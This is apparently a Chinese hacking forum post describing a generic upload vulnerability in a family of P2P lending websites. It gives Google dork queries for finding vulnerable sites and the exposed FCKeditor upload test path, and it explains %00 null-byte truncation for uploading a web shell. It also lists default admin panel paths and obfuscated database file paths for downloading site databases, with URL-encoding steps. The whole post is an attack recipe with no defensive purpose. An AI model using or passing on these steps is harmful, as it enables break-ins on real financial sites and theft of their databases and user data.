某p2p存在通用上传漏洞

google链接查找:

inurl:shouyi.asp
inurl:itemlist_xq.asp?id=

很多存在Fckeditor上传链接:

?

1	FCKeditor/editor/filemanager/connectors/uploadtest.html

 

抓包上传%00截断后发送就能获取shell

如果一次发送不行， 就发送多几次即可

如果多次发送同一数据包不行就把%00改成两个%00%00再截断送送一次或多次即可拿shell

 

通用后台与数据库下载:

?

1 2 3 4 5 6 7 8 9 10 11 12

后台:   cpcms_admin\cplogin.asp 数据库: cp_data\cp_dsds%#^&@!daaa_cc\#$ssjjb##17#65&&^_^%@&@34546$3$3.mdb 数据库: cp_data\#$ssjjb##17#65&&^_^%@&@34546$3$3.mdb   或 后台:   ajcmsadmin\account.asp 数据库: ajcmsadmin\nnyylczccydata\#$ssjjb##17#654543534546$3$3.mdb     或 后台:   ailangeadmin\account.asp 数据库: shujukuDSDFE489#$###789sdf\DS#@FCsad54534234433###\#$ssjjb##17#65454###23233534546$3$3.mdb

 

 

 

注意， 如果要下载数据库， 要把特殊字符转为url编码。

比如：

?

1 2 3

cp_data\cp_dsds%#^&@!daaa_cc\#$ssjjb##17#65&&^_^%@&@34546$3$3.mdb 转码为: cp_data\cp_dsds%25%23%5e%26%40%21%64%61%61%61%5f%63%63%5c%23%24%73%73%6a%6a%62%23%23%31%37%23%36%35%26%26%5e%5f%5e%25%40%26%40%33%34%35%34%36%24%33%24%33%2e%6d%64%62

 

些种p2p界面型形如下: